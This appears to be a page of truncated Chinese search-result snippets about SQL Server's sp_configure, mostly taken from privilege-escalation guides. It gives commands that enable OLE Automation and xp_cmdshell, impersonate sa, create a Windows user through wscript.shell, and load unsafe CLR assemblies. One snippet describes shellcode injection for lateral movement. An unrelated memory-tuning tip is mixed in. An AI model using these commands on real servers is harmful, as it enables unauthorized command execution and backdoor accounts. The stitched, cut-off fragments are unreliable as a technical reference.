EXEC sp_configure 'show advanced options', 0; 打开组件,2005中默认关闭 1)直接加用户 2000系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add' declare @shell int exec sp_oacre...
当xp_cmdshell不可用时,则可以利用sp_oacreate提权;其本身是一个很危险的存储过程,可以删除、复制、移动文件,或者是配合sp_oamethod来写文件执行cmd命令。 提权条件:系统管理员使用sp_configure启用sp_oacreate和sp_oamethod系统存储过程对OLE自动化过程的访问。 5.1判断组件是否存在 执行指令: selectcount(*)frommaster...
这句子就是搜索在master.dbo.sysobjects中的数据,什么数据呢,就是名字是 'sp_oacreate',xtype(一种类型)是'x'的数据。 返回1说明存在这条数据,说明这个模块打开了,否则需要手动打开 手动打开: exec sp_configure'show advanced options',1;reconfigure;exec sp_configure'Ole Automation Procedures...
如果有sysadmin角色权限的话,可以使用advanced options和sp_configure存储过程启用。我们先模拟sa,然后使用sp_configure激活advanced options并启用xp_cmdshell: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 EXECUTEASLOGIN='sa';EXECsp_configure'show advanced options',1;RECONFIGURE;EXECsp_configure'xp_cmdshell...
sp_configure'clr enabled',1GORECONFIGUREGO 当导入了不安全的程序集之后,需将数据库标记为可信任的,对于其他数据库需要执行如下语句,但对 msdb 不需要,默认 msdb 就是的可信任的 代码语言:javascript 代码运行次数:0 运行 AI代码解释 ALTERDATABASEmasterSETTRUSTWORTHYON; ...
EXEC sp_configure ‘max memory ‘, 1024; GO RECONFIGURE; GO 2.优化查询 MSSQL服务器执行数据库查询时,会使用大量的内存。如果查询的内存使用量太大,就会导致内存使用过多的情况。因此可以优化查询,减少查询中用到的内存量。 3. 缩减缓存 缓存数据会占用内存,因此可以减少一些缓存,将搜索和排序操作关闭,也可以...
--关闭所有服务器配置sp_configure'show advanced options',0; RECONFIGUREWITHoverride GO--关闭 CLRsp_configure'clr enabled',0; RECONFIGUREWITHoverride GO (2)CLR Function 打开Visual Studio新建SQL server项目 添加SQL CLR C# 存储过程 写入代码 using System; ...
sp_configure 'show advanced options',0;RECONFIGURE 此时,SQL Server进程正在执行提供给它的任何.NET代码,因此利用它进行横向移动只需要构造适当的DLL即可。在PoC中,生成了一个简单的程序集,该程序集会对一些shellcode进行异或运算,并将其注入到派生的进程中。
sp_configure'Ole Automation Procedures',0; RECONFIGURE; EXECsp_configure'show advanced options',0; RECONFIGURE; 以上是使用sp_oacreate的提权语句,主要是用来调用OLE对象(Object Linking and Embedding的缩写,VB中的OLE对象),利用OLE对象的run方法执行系统命令。在oacreate的官方文档里明确指出了,如果要使用OLE对象...
在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权 首先 EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0; ...